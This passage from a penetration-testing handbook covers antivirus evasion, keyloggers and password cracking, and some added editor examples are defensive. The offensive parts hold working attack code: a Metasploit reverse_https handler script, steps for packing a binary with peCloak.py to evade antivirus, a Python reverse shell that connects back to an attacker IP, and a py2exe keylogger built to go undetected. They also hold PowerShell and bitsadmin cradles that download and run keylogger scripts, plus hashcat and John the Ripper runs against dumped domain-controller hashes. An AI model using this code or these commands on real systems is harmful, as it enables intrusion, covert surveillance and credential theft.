-rw-r--r-- 1 root root 283 Mar 23 14:28 metasetup.rc

-rw-r--r-- 1 root root 92 Mar 23 14:28 sha1-backdoor.hash

In that same folder you will also see the metasetup.rc script. RC scripts will be discussed a little later
in the book, but if you take a look at the file, you will see something similar to the code below:


• spool /opt/smbexec/2015-03-23-1425-smbexec/msfoutput-1425.txt
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_https
• set LHOST 172.16.139.209
• set LPORT 443
• set SessionCommunicationTimeout 600
• set ExitOnSession false
• set InitialAutoRunScript migrate -f
• exploit -j -z


This script automatically configures and runs a reverse handler for the payload you just
generated. It also adds commands such as setting the session timeout and automatically migrating each new
session into a freshly spawned process (migrate -f), so that the shell survives if the user closes backdoor.exe. To run the RC
script, use the following command:

• msfconsole -r metasetup.rc


PeCloak.py
(http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) (Windows)


peCloak.py is a Python script that takes an automated approach to AV evasion. Although this is
experimental code, I really like what Mike Czumak did. He took many of the common evasion tricks
and wrote something to automate them. He built a simple encoder/decoder, added a number of
instructions that waste cycles in an effort to trick the AV scanner's emulation, and utilized code caves (like we
discussed with The Backdoor Factory).


Installation does take a few steps; this was installed on a 32-bit Windows XP system:
• Download http://www.securitysift.com/download/peCloak.py
• Install http://sourceforge.net/projects/winappdbg/files/additional%20packages/PyDasm/
• Install https://code.google.com/p/pefile/downloads/list
• Save http://git.n0p.cc/?p=SectionDoubleP.git;a=blob_plain;f=SectionDoubleP.py;h=93717cdd0ac2935481b9
as SectionDoubleP.py

I also had to modify the peCloak.py file:
• On line 220, I had to change "pe.write(pe.OPTIONAL_HEADER.SizeOfHeaders, filename=fname) # MODIFIED WRITE FUNCTION IN PEFILE!!!" to "pe.write('cloaked.exe')"


Once we get peCloak.py running, we can test it on a copy of wce.exe:
• python.exe peCloak.py -e .text,.data:50:5000 wce.exe





[Screenshot: peCloak.py Beta running against wce.exe and writing cloaked.exe]

peCloak.py Beta


As we can see, it goes through all of the evasion techniques and produces an output file called
"cloaked.exe". In the image below, we take our modified binary and run it to make sure it executes
normally. You will notice it takes longer to start after execution, due to all
the extra instructions added by peCloak.py.


[Screenshot: cloaked.exe executing normally, with peCloak's cave jumps visible in the output]

peCloak.py - Cave Jumps


When running the obfuscated wce.exe file through VirusTotal, we find that it doesn't get picked up by
many of the common corporate AV solutions.


[Screenshot: VirusTotal report for cloaked.exe, analysis date 2015-03-21 23:19:38 UTC, detection ratio
7/57. Of the engines visible, only VBA32 (Malware-Cryptor.General.3) and Tencent
(Trojan.Win32.Qudaman.Gen.2) flagged it; Symantec, Sophos, TrendMicro, TrendMicro-HouseCall, VIPRE,
ViRobot, TotalDefense, TheHacker, SUPERAntiSpyware and others did not.]

VirusTotal Results


Remember, this is really beta code, but I wanted to demonstrate how you can write your own 
obfuscators. 


Python 


Python is your best friend. I use Python to create most of my exploits and tools. There are several
reasons why Python works so well. First, it is common to see application white-listing configured to
allow Python. Second, you can very easily add randomness to get around any signature. And
third, using something like py2exe you can turn the script into a self-contained executable.


Python Shell
Watching Dave Kennedy's talk at BSides in 2012{45} took me down the track of using Python to
create malicious payloads. The simplest example of this is creating a Python reverse shell and wrapping it
up with py2exe. This is Python 2 code (the book uses C:\python27):
• #!/usr/bin/python
import socket, subprocess

HOST = '192.168.10.100'   # attacker box with netcat listening
PORT = 5151

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('[*] Connection Established!')

while 1:
    data = s.recv(1024)               # one command line per read
    if not data or data.strip() == 'quit': break   # netcat sends "quit\n"
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdout_value = proc.stdout.read() + proc.stderr.read()
    s.send(stdout_value)              # return the command output
s.close()


When this code executes, it creates a connection back to 192.168.10.100, where I will have
netcat listening on port 5151. This reverse shell gives me command-line access to the host.
Using pyinstaller, we can convert the Python file into an executable:
• C:\python27\python.exe C:\utils\pyinstaller-2.0\pyinstaller.py --out=C:\shell\ --noconsole --onefile C:\shell\shell.py


Again, if you try to scan this file with AV, it won't be picked up.


Python Keylogger
Everyone uses different types of keyloggers and this one is no different. My goal was to develop
something that would most likely be accepted by white-listed application lists and be able to run
undetected by AV. Included below is simple code to have Python start recording all keyboard
presses:{46}
• import pyHook, pythoncom, sys, logging

file_log = 'C:\\systemlog.txt'

def OnKeyboardEvent(event):
    # append each keypress as one line of the log file
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    logging.log(10, chr(event.Ascii))
    return True          # pass the keystroke through so the user notices nothing

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()


Here is my setup.py file:
• from distutils.core import setup
import py2exe

setup(options = {'py2exe': {'bundle_files': 1, 'compressed': True}},
      windows = [{'script': "logger.py"}],
      zipfile = None,
)


And using py2exe, I will convert the Python script to an executable with the following commands:
• python.exe setup.py install

• python.exe setup.py py2exe

Now I will have an executable binary of the keylogger that records all keystrokes and stores them
in C:\systemlog.txt. Pretty simple and easy, and AV never detected it. If you need to, you
may add some randomness in there to make sure it isn't picked up by signatures or hash matching.


Other Keyloggers 


Being able to drop an undetectable keylogger can make a huge difference in situations where you 
can’t pull passwords from memory or look for web-based passwords. I will show you two different 
examples that can be executed from a command line. 


Keylogger Using Nishang
(https://github.com/samratashok/nishang):


Nishang is a collection of PowerShell scripts used for pre/post exploitation. One of the scripts is
called Keylogger.ps1. As I keep reiterating throughout the book, and as you will notice on different
penetration tests, nothing ever works perfectly. You will need to know different ways to execute
commands and understand that different environments may or may not allow you to do certain things.
In this case, we assume that we have a shell on the system. We are going to use bitsadmin, which
Windows itself uses to download updates, to download our keylogger and put it in the Public
folder. We will then go to the Public folder and execute the keylogger. The keylogger has many other
functions, such as pushing the logs to Twitter, so I recommend you read through it before executing
anything.

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high https://raw.githubusercontent.com/cheetz/nishang/master/Gather/Keylogger.ps1 c:\Users\Public\Keylogger.ps1"

• cd \users\public

• powershell.exe -NoP -W Hidden -exec bypass -noexit -Command ".\Keylogger.ps1 http://127.0.0.1 stopthis"


The output will be located at:
• C:\Users\[Account]\AppData\Local\Temp\key.log


Note that when looking at the file, it is obfuscated and needs to be converted. Once you move this file
onto your box, convert the logs using the Parse_Keys.ps1 PowerShell script located here:





Here is the command to convert the logs:
• powershell.exe -exec bypass -Command "& {Import-Module .\Parse_Keys.ps1; Parse_Keys key.log output.log}"


And your decoded keylog output file is written to output.log.


Keylogger Using Powersploit 
(https://github.com/mattifestation/PowerSploit): 


The other keylogger with which I have had some success is the Get-Keystrokes PowerShell script. Similar to running the Nishang script, this can be executed by the following command:
• powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.github.com/cheetz/PowerSploit/master/E
Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log"
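The following is an added example from the editor, not from the book and not from the Nishang or PowerSploit projects. It takes the two staging patterns just shown (bitsadmin pulling a script into the Public folder, then powershell.exe launched hidden with the execution policy bypassed, or an in-memory DownloadString/IEX cradle) and writes them as the checks a detection engineer would run over process-creation command lines (Windows event 4688 or Sysmon event 1). The event records, the host example.invalid and the rule names are constructed for illustration and are not real indicators.

```python
# Added example (editor's, not from the book): flag the keylogger staging
# pattern described above in process-creation telemetry. Events are
# CONSTRUCTED; "example.invalid" is a placeholder host, not an indicator.
import re

SAMPLE_EVENTS = [  # constructed, reduced to the fields the checks need
    {"id": 1, "cmdline": 'cmd.exe /c "bitsadmin /transfer myjob /download /priority high '
                         'https://example.invalid/Keylogger.ps1 c:\\Users\\Public\\Keylogger.ps1"'},
    {"id": 2, "cmdline": 'powershell.exe -NoP -W Hidden -exec bypass -noexit '
                         '-Command ".\\Keylogger.ps1 http://127.0.0.1 stopthis"'},
    {"id": 3, "cmdline": "powershell.exe -exec bypass IEX \"(New-Object Net.WebClient)"
                         ".DownloadString('https://example.invalid/Get-Keystrokes.ps1');"
                         "Get-Keystrokes -LogPath C:\\Users\\Public\\key.log\""},
    {"id": 4, "cmdline": "bitsadmin /list /allusers"},                        # benign admin use
    {"id": 5, "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},  # benign
]

# Each rule: name plus the regexes that must ALL match (case-insensitive).
# PowerShell accepts abbreviated switches (-W, -exec, -ep), so the patterns
# match the prefix rather than the full switch name.
RULES = [
    ("bitsadmin_remote_transfer", [r"\bbitsadmin(\.exe)?\b", r"/transfer\b", r"https?://\S+"]),
    ("powershell_hidden_window",  [r"\bpowershell(\.exe)?\b", r"-w(?:indowstyle)?\s+hidden\b"]),
    ("powershell_exec_bypass",    [r"\bpowershell(\.exe)?\b", r"-e[a-z]*\s+bypass\b"]),
    ("download_cradle",           [r"downloadstring\s*\(", r"\biex\b|invoke-expression"]),
    ("public_folder_path",        [r"\\users\\public\\"]),
]


def match_rules(cmdline):
    """Return the names of every rule whose patterns all match the command line."""
    return [name for name, pats in RULES
            if all(re.search(p, cmdline, re.IGNORECASE) for p in pats)]


def triage(events, min_hits=2):
    """Map event id -> matched rule names, and list the ids to escalate.
    One rule alone (bitsadmin, a bypass switch) is often legitimate admin
    use; two or more on one command line is the combination worth a look."""
    hits = {e["id"]: match_rules(e["cmdline"]) for e in events}
    escalate = [eid for eid, names in hits.items() if len(names) >= min_hits]
    return hits, escalate


if __name__ == "__main__":
    hits, escalate = triage(SAMPLE_EVENTS)
    for eid, names in hits.items():
        print(eid, names or "-")
    print("escalate:", escalate)
```

The thresholding is deliberate: bitsadmin transfers and `-exec bypass` both occur in ordinary administration, so alerting on the pair (or on a cradle writing into a world-writable folder) keeps the rule useful without drowning the analyst.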


Conclusion 


There are many different techniques to evade AV. Although this is not a complete list, this should give you a good overview of where to start if you are battling anti-virus. The last thing you want is for AV to stop you from popping a box that you can potentially exploit.


Penetration testing is all about trying out different tools, techniques, and tactics to find what works in that particular environment. Remember not to submit your executable to a repository like VirusTotal, as the lifespan of your executable might shrink dramatically.


Special Teams - Cracking, Exploits, And Tricks 


This section focuses on all other methods that can assist in penetration testing but do not fit in the other sections. I will discuss some of the tips and tricks I have for cracking password hashes, searching for vulnerabilities, and some shortcuts.


Password Cracking 


There are many different tools to use for password cracking; however, I am going to focus mainly on the two tools that I use: John the Ripper (JtR) and oclHashcat. Both are excellent tools for cracking passwords.


Before I can start talking about different password crackers, it is important to make sure you 
understand the basic definitions. The three configurations you should generally make for an efficient 
password cracking process are to define wordlists, rules, and hashing algorithms. 


Wordlists: This is exactly what it sounds like—they are files that contain password lists in cleartext. 
The password cracker software will try to hash each one of these passwords and see if they match the 
hash that you are trying to crack. 


I generally like to take wordlists from prior password compromises and incorporate them with the 
type of organization you are dealing with. For example, if you are cracking NTLM hashes from a 
domain controller, make sure you understand what their password policy is. There is no point trying 
four or five-letter passwords if they require a minimum of eight characters. 


Here are some of my favorite wordlists: 

List Name: RockYou 

Details: Compromised in 2009 from a social game and advertising website. This is a great list to start with as it isn't too large and contains a lot of the common passwords with a decent success rate.
Download Link: 

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 


List Name: Crackstation-human-only 
Details: Real human passwords leaked from various website databases. There are about 64 million 
passwords in this list. GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 


Download Link: 
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: Crackstation-Full 
Details: Full crackstation passwords leaked from various website databases. Extremely large. GZIP- 
compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 


Download Link: 
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: m3g9tr0n_Passwords_WordList_CLEANED
(http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords)





Details: List of 122 million passwords 


Download Link: 
http://bit.ly/KrTcHF 


List Name: Ten Million Passwords 
Details: A researcher Mark Burnett combined all the recent password dumps and compiled a list of 
the top ten million passwords. 


Download Link: 
https://xato.net/passwords/ten-million-passwords/ 
• Torrent File: magnet:?xt=urn:btih:32E50D9656E101F54120ADA3CE73F7A65EC9D5CB&dn=10-million-combos.zip&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce
• To create a unique list of just passwords:
• unzip 10-million-combos.zip
• cut -f2 10-million-combos.txt | sort -u > 10-million-unique.txt


List Name: Wick2o's Password List from Dump Monitor

Details: Wick2o monitors leaks on pastebin and similar sites.

Download: git clone https://github.com/wick2o/Dump-Monitor-WordLists.git /opt/Dump-Monitor-WordLists


Other places to get passwords or password lists: 


• https://github.com/danielmiessler/SecLists/tree/master/Passwords
• https://archive.org/details/pastebinpastes
• https://wiki.skullsecurity.org/Passwords
• http://www.leakedin.com/tag/emailpassword-dump/
• https://www.reddit.com/domain/pastie.org/search?q=password+leak&sort=relevance&t=month
• Scraping all pastebin/pastie/... sites


Rules: Rules define which modifications need to be applied to the words in the wordlist. The best way to describe rules is by an easy-to-follow example. We can take and use the KoreLogicRulesAppendYears (http://contest-2010.korelogic.com/rules.html) set of rules, which look like the following:

• cAz"19[0-9][0-9]"
• Az"19[0-9][0-9]"
• cAz"20[01][0-9]"
• Az"20[01][0-9]"

It will append the years from 1949 to 2019 to each and every password. If the password list contained the word "hacker", it would try to crack the hash for the string hacker1949 all the way to hacker2019. Remember, the more complex rules you have, the more time it will take to finish going through all the different words in the word list.
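Added example (the editor's, not from the book and not John the Ripper's code): a small interpreter for the rule subset used above, written as a password-policy check rather than a cracker. It expands the [0-9] and [01] preprocessor classes exactly as the four KoreLogic lines are written, applies the c (capitalize) and Az"..." (append at end) commands, and reports whether a candidate password is reachable from a dictionary word. These lines are JtR rule syntax (hashcat's rule language has no class preprocessor and appends with $X instead). KORELOGIC_APPEND_YEARS and the function names are this example's own.

```python
# Added example (editor's, not from the book): JtR-style rule expansion,
# used to reject passwords that are "dictionary word + appended year".
import itertools
import re

CLASS_RE = re.compile(r"\[([^\]]+)\]")   # preprocessor class such as [0-9] or [01]


def expand_class(body):
    """Expand a class body: '0-9' -> '0123456789', '01' -> '01'."""
    chars, i = [], 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
            i += 3
        else:
            chars.append(body[i])
            i += 1
    return "".join(chars)


def preprocess(rule):
    """JtR preprocessor: one concrete rule per combination of the [..] classes."""
    parts = CLASS_RE.split(rule)            # literal, class, literal, class, ..., literal
    literals, classes = parts[0::2], [expand_class(c) for c in parts[1::2]]
    expanded = []
    for combo in itertools.product(*classes):
        text = literals[0]
        for ch, lit in zip(combo, literals[1:]):
            text += ch + lit
        expanded.append(text)
    return expanded


def apply_rule(word, rule):
    """Apply the commands c, l, u, $X and AN"STR" of one expanded rule."""
    w, i = word, 0
    while i < len(rule):
        cmd = rule[i]
        if cmd == "c":                      # capitalize first char, lowercase the rest
            w = w[:1].upper() + w[1:].lower()
            i += 1
        elif cmd == "l":
            w, i = w.lower(), i + 1
        elif cmd == "u":
            w, i = w.upper(), i + 1
        elif cmd == "$":                    # append one character
            w, i = w + rule[i + 1], i + 2
        elif cmd == "A":                    # A N "STR": insert STR at position N (z = end)
            pos, end = rule[i + 1], rule.index('"', i + 3)
            s = rule[i + 3:end]
            n = len(w) if pos == "z" else int(pos)
            w, i = w[:n] + s + w[n:], end + 1
        elif cmd == " ":
            i += 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r} in {rule!r}")
    return w


def candidates(word, rules):
    """Every string the rule set can derive from one wordlist entry."""
    return {apply_rule(word, r) for rule in rules for r in preprocess(rule)}


def is_rule_reachable(password, wordlist, rules):
    """Policy check: True if password is a dictionary word with a rule applied."""
    return any(password in candidates(word, rules) for word in wordlist)


# The four KoreLogic lines from the text, as written there.
KORELOGIC_APPEND_YEARS = ['cAz"19[0-9][0-9]"', 'Az"19[0-9][0-9]"',
                          'cAz"20[01][0-9]"', 'Az"20[01][0-9]"']

if __name__ == "__main__":
    derived = sorted(candidates("hacker", KORELOGIC_APPEND_YEARS))
    print(len(derived), "candidates, e.g.", derived[:3], "...", derived[-3:])
    print(is_rule_reachable("Hacker2015", ["hacker"], KORELOGIC_APPEND_YEARS))
```

For a real policy check you would precompute the candidate set once per dictionary word (or hash it with the site's own password hash) rather than regenerating it per login attempt; the point here is the expansion itself, which is why a 4-line rule set costs 240 hash computations per word.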

Hash Algorithms: A hashing algorithm is used to generate the password hash. These are very 
important because if you select the wrong algorithm, it will either fail to run or fail to crack. For 
example, if we select the MD5 algorithm for SHA1 hashes, the cracking tools will not find any hashes 
to crack and will exit immediately. 


Now that we have basic understanding of different cracking configurations, let's compare John the 
Ripper versus oclHashcat. 


John The Ripper 
(http://www.openwall.com/john/) (Windows/Kali Linux/OS X): 


I used to regularly use John the Ripper (JtR) but moved away from it a while ago due to the GPU 
support from oclHashcat. However, JtR Jumbo does have CUDA and OpenCL support now. Here is a 
list of JtR hash formats to help you identify which type of password you are cracking: 
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats.


Cracking MD5 Hashes
Let's say you are able to compromise a *nix system or maybe a database full of password hashes. You will most likely run into MD5 or SHA hashes, but for the following example, we will assume that they are unsalted MD5 hashes. If you are looking to crack standard MD5 hashes, the basic command is:

• john --format=raw-md5 --pot=./list.pot md5list.txt


This will tell john the ripper to look in the md5list.txt file for MD5 hashes and write any cracked 
passwords into the file list.pot. 


root@kali:~# john --format=raw-md5 --pot=./list.pot md5list.txt
Loaded 3 password hashes with no different salts (Raw MD5 [128/128 SSE2])
test             (test)
password         (user)
woot             (hacker)
guesses: 3  time: 0:00:00:01 DONE (Sun Dec 29 18:32:12 2013)


If you are using the JtR Jumbo pack and want to take advantage of GPU processing:
• john --format=raw-md5-opencl --wordlist=./Wordlists/all.lst --rules:Single md5list.txt


Here are additional sources on using JtR: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords.


OclHashcat
(http://hashcat.net/oclhashcat/) (Windows/Kali Linux):


Honestly, this is the tool I use most when password cracking. As we all know, graphics processing units (GPUs) are great for cracking passwords as they use many cores in parallel. The advantage of GPUs over CPUs is very significant, and oclHashcat demonstrates it well.


In the following examples, I am going to go over cracking WPAv2 and NTLMv2. These are the most common hash types I run into and they are typically the groundwork for any other types of hashes. If you want to see all the different hash types that oclHashcat supports, visit their website at http://hashcat.net/oclhashcat/.


Cracking WPAv2
In the beginning of the book, I discussed how to capture the WPAv2 handshake, which is required for password cracking. The output from the capture was a .hccap file. This is the file format that oclHashcat supports for brute forcing WPA-hashed passwords.


In the following examples, I am going to utilize oclHashcat on my Windows host using a GeForce GTX 680. Generally, I prefer using the ATI Radeon cards, but for this example, it won't make much of a difference. To kick off the password cracking, I will use the command:

• cudaHashcat-plus64.exe -m 2500 out.hccap list\rockyou.txt


[Screenshot: oclHashcat Example. cudaHashcat-plus 0.14 starting on a GeForce GTX 680 against out.hccap with list\rockyou.txt (1 hash, 1 unique salt loaded; rules: 1; watchdog temperature abort trigger 90c)]





This is a very straightforward example, which says to crack WPAv2 hashes against the out.hccap file 
and use the password list from rockyou.txt. 


Cracking NTLMv2
If you have compromised a Windows host or maybe a Domain Controller, you will have to crack NTLM hashes. You can always try to crack the LM hashes, but they are becoming more and more difficult to find, so we will stick with the NTLM hashes.


In the following example, we are taking a list of NTLM hashes and using the rockyou password list.


[Screenshot: oclHashcat NTLM. cudaHashcat-plus64.exe -m 1000 NTLM.txt list\rockyou.txt; two hashes recovered, with the plaintexts password! and hacker; started Mon Dec 09 09:41:45 2013, stopped 09:41:58]





From the example above, there were three unique passwords, but oclHashcat was only able to crack 
two of the three passwords. To increase our chances, I am going to add the passwordspro rule set to 
assist with the rockyou password list. If you want to get a little deeper into understanding these rules, 
try starting at the oclHashcat page: 

http://hashcat.net/wiki/doku.php?id=rule_based_attack. 


[Screenshot: oclHashcat with Rules. The same NTLM.txt run against list\rockyou.txt with -r rules\passwordspro.rule (3 hashes, 3 unique digests); the same two plaintexts recovered, the third hash still uncracked]


Using the rules didn't actually find the password for the third hash. In larger password hash lists, this 
would have definitely found more passwords, but was only able to find two out of the three 
passwords in this scenario. 


To increase our chances even more, I will try a much larger password list. This, of course, increases the amount of time needed to run this job. However, if it resolves a password, it will be worth it. The command to use is:
• cudaHashcat-plus64.exe -m 1000 NTLM.txt lists\realhuman.txt -r rules\passwordspro.rule





[Screenshot: oclHashcat with Different Password List. cudaHashcat-plus64.exe -m 1000 NTLM.txt lists\realhuman.txt -r rules\passwordspro.rule; dictionary stats for lists\realhuman.txt: 6270055 words; the third hash recovered; started Mon Dec 09 2013, run time 3 mins, 14 secs]
As you can see from the results, the new password list and rule set recovered the third password. Just 
by playing around with different password lists and rule sets, you can quickly find out what works 
and what just takes too long to run. This is all based on what types of GPUs you have, how long the 
password lists are, and the complexity of your rule set. 


Whether you want to crack MD5 hashes, MSSQL hashes, SHA1 hashes, or others, this same query can be run by changing the "-m" parameter. For a full listing of hashes that oclHashcat accepts and cracks, go to:


Cracking in Real Life
You were able to successfully dump the Domain Controller. The next step is to see what you are able to recover. Historically there were Rainbow tables, but with minimum length restrictions, size and time became a huge issue. Trying to create Rainbow tables for 10+ characters becomes so expensive that it isn't really usable on a penetration test (unless you find LM hashes).





oclHashcat is the fastest password recovery tool that I have ever dealt with. I have used John the 
Ripper and other tools, but due to the use of GPUs, rules, pre-processing, and password lists, I 
generally turn to oclHashcat as my go-to password-cracking tool. This chapter will talk about how to 
effectively use oclHashcat in a pentest and will mostly focus on cracking NTLM hashes; however, 
you can use these examples with any hashes. 


My password cracking rig was presented in the Pre-Game phase and with a little bit of money, you 
can be running your own password cracking monster. 


So, you were able to extract the SUCK Domain Controller hashes. The next step is to be able to see what you can recover from those hashes. In our example, we are using a password dump similar to what I have seen in the field. Our compromised DC has a list of over 21,000 hashes. We could first start by straight brute forcing through all the characters, but is this really feasible? Let's see by running the command:

• oclHashcat64.exe -m 1000 hashes\hashes.lst -a 3 ?a?a?a?a?a?a?a?a --force


Command Breakdown:
• oclHashcat Executable: oclHashcat64.exe
• -m 1000: The hashes we are supplying are in the NTLM format
• hashes\hashes.lst: Stored location of the Domain Controller hashes
• -a 3: use brute-force attack mode (with the mask below)
• ?a?a?a?a?a?a?a?a: 8 characters, each drawn from all letters (upper/lower case), numbers and special characters


This definitely isn’t the most efficient way to crack hashes, but it can really cover those odd 
passwords like Jdkl!3vG that might not be in a password list. Masks will be very important to learn, 
so if you haven’t dealt with them before, make sure to check out oclHashcat’s site: 


https://hashcat.net/wiki/doku.php?id=mask_attack. 


Remember that we are going for speed and efficiency on a test, so let’s see what results the brute- 
force attack will provide: 


[Screenshot: oclHashcat Brute-Force. Session.Name oclHashcat; Status Aborted; Input.Mode Mask (?a?a?a?a?a?a?a?a) [8]; Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Time.Started Sun Jan 18 16:43:57 2015 (14 secs); Time.Estimated Thu Jan 22 17:37:23 2015 (4 days); Speed.GPU.#1 9557.0 MH/s, Speed.GPU.#2 10268.8 MH/s, Speed.GPU.#* 19825.8 MH/s; Recovered 0/21318 (0.00%) Digests, 0/1 (0.00%) Salts; Started Sun Jan 18 16:43:57 2015, Stopped Sun Jan 18 16:44:12 2015; command line C:\Users\cheetz\Downloads\oclHashcat-1.32>oclHashcat64.exe -m 1000 hashes\hashes.lst -a 3 ?a?a?a?a?a?a?a?a --force]





We can already see that this is going to take four days to go through all eight characters. We could use smarter masks based on human tendencies. We know that if there are password requirements, such as upper/lower/special character, most people put the capital letter in the front and the special character at the end. We could create these custom masks to improve efficiency, but this will still take a fair amount of time.
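The arithmetic behind that four-day estimate, as an added example (the editor's, not from the book and not hashcat's code). Charset sizes are hashcat's built-in ones (?l 26, ?u 26, ?d 10, ?s 33, ?a 95); SCREENSHOT_RATE is the 19825.8 MH/s GPU total shown in the brute-force screenshot above. The same function sizes a policy-shaped mask such as ?u?l?l?l?l?l?d?s, which shows why the "capital first, special last" habit is cheap to cover, and accepts custom charsets; the `custom` parameter and function names are this example's own. A defender can use it the other way round: given a known cracking rate, size the worst case a password policy actually buys.

```python
# Added example (editor's, not from the book): keyspace and run-time
# estimate for a hashcat mask. Charsets are hashcat's built-ins.
import string

BUILTIN = {
    "l": string.ascii_lowercase,          # 26
    "u": string.ascii_uppercase,          # 26
    "d": string.digits,                   # 10
    "s": string.punctuation + " ",        # 33: hashcat ?s includes the space
    "h": "0123456789abcdef",              # 16
    "H": "0123456789ABCDEF",              # 16
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]   # 95

# GPU total reported in the brute-force screenshot above, in hashes/second.
SCREENSHOT_RATE = 19825.8e6


def expand_charset(spec, custom=None):
    """Characters named by a charset spec such as '?l?d' or 'abc?d'.
    ?? is a literal '?', ?1..?4 are looked up in `custom`, anything else
    is a literal character. Duplicates are removed, order preserved."""
    custom = custom or {}
    chars, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            sel = spec[i + 1]
            if sel == "?":
                chars.append("?")
            elif sel in BUILTIN:
                chars.extend(BUILTIN[sel])
            else:
                chars.extend(expand_charset(custom[sel], custom))
            i += 2
        else:
            chars.append(spec[i])
            i += 1
    return "".join(dict.fromkeys(chars))


def mask_keyspace(mask, custom=None):
    """Candidates a mask describes: the product of the per-position charset
    sizes, where a literal (non-?x) character contributes 1."""
    total, i = 1, 0
    while i < len(mask):
        token = mask[i:i + 2] if mask[i] == "?" else mask[i]
        total *= len(expand_charset(token, custom))
        i += len(token)
    return total


def time_to_exhaust(mask, rate_hps, custom=None):
    """Seconds to run the full keyspace at rate_hps hashes per second."""
    return mask_keyspace(mask, custom) / rate_hps


if __name__ == "__main__":
    for mask in ("?a?a?a?a?a?a?a?a", "?u?l?l?l?l?l?d?s"):
        secs = time_to_exhaust(mask, SCREENSHOT_RATE)
        print(f"{mask}: keyspace {mask_keyspace(mask):,}, "
              f"{secs:,.0f} s = {secs / 86400:.2f} days at {SCREENSHOT_RATE:.3e} H/s")
```

The full ?a mask comes out at 95^8 = 6,634,204,312,890,625 candidates, about 3.9 days at the screenshot's rate, which matches the estimate above; the policy-shaped 8-character mask is around 1.0e11 candidates and finishes in seconds, which is the real argument for length over complexity rules.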


For efficiency's sake, the next best step is to start testing large password lists. We are going to focus on using two different password lists: Crackstation and m3g9tr0n Passwords. It is important for you to find out which password lists work well in various industries. Let's start with the Crackstation list, which contains roughly 64 million passwords:
• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt --force


The results below on the left show that in six seconds, we were able to test all the hashes against the 
password list. Using the Radeon R9 295x2, we are able to get some great speed against these lists. 
Unfortunately, the results from these hashes are pretty low with 780 or about 3.66% passwords 
recovered. 


The next step is to run the hashes against rules. Luckily, oclHashcat has provided a list of great rules to run. They are located inside the oclHashcat directory, in the rules folder. I recommend going through each of them and understanding what the differences are between the rules. In the next example, we are going to use the same password list and, this time, incorporate a great rule set:
• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt -r rules\InsidePro-PasswordsPro.rule --force


[Screenshot: oclHashcat - Wordlist Cracking (two panels). Left: Input.Mode File (lists\crackstat_realhuman_phill.txt) with no rules; Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Status Exhausted; Time.Started Sat Jan 17 13:50:34 2015 (6 secs); Speed.GPU.#* about 11.7 MH/s; Recovered 780/21318 (3.66%) Digests, 0/1 (0.00%) Salts; Started Sat Jan 17 13:50:34 2015, Stopped Sat Jan 17 13:56:45 2015. Right: the same list with rules\InsidePro-PasswordsPro.rule. Sample cracked plaintexts shown: Zxcvbnm4, Zxcv1234, zxcvbnm8]





In the image above on the right, by using rules, we are processing about 7 million hashes a second, which took about 40 seconds. Still well within our time limit, we have now cracked 38%, or 8180 hashes. This is now looking positive. Let's throw another password list at it this time. From the prep stages, we should have the eNtr0pY_ALL_sort_uniq.dic that we can use:
• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtr0pY_ALL_sort_uniq.dic -r rules\InsidePro-PasswordsPro.rule --force


[Screenshot: oclHashcat - Adding Rules. Session.Name oclHashcat; Status Exhausted; Rules.Type File (rules\InsidePro-PasswordsPro.rule); Input.Mode File (lists\eNtr0pY_ALL_sort_uniq.dic); Hash.Target File (hashes\hashes.lst); Speed.GPU.#1 6302.1 MH/s, Speed.GPU.#2 3026.6 MH/s; Recovered 10733/21318 (50.35%) Digests, 0/1 (0.00%) Salts; Started Sat Jan 17 13:58:05 2015, Stopped Sat Jan 17 13:58:40 2015. Sample cracked plaintexts shown: Xenogears85, Yours1968, WrigleY3]


This took about the same amount of time for 122 million passwords, but we were able to go from 38% up to 50% of recovered hashes in a few minutes total.


We can keep playing around with additional rules and make small gains, but at some point the rules 
will stop making a difference. We need to find new words to add to our password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtr0pY_ALL_sort_uniq.dic -r rules\InsidePro-HashManager.rule --force


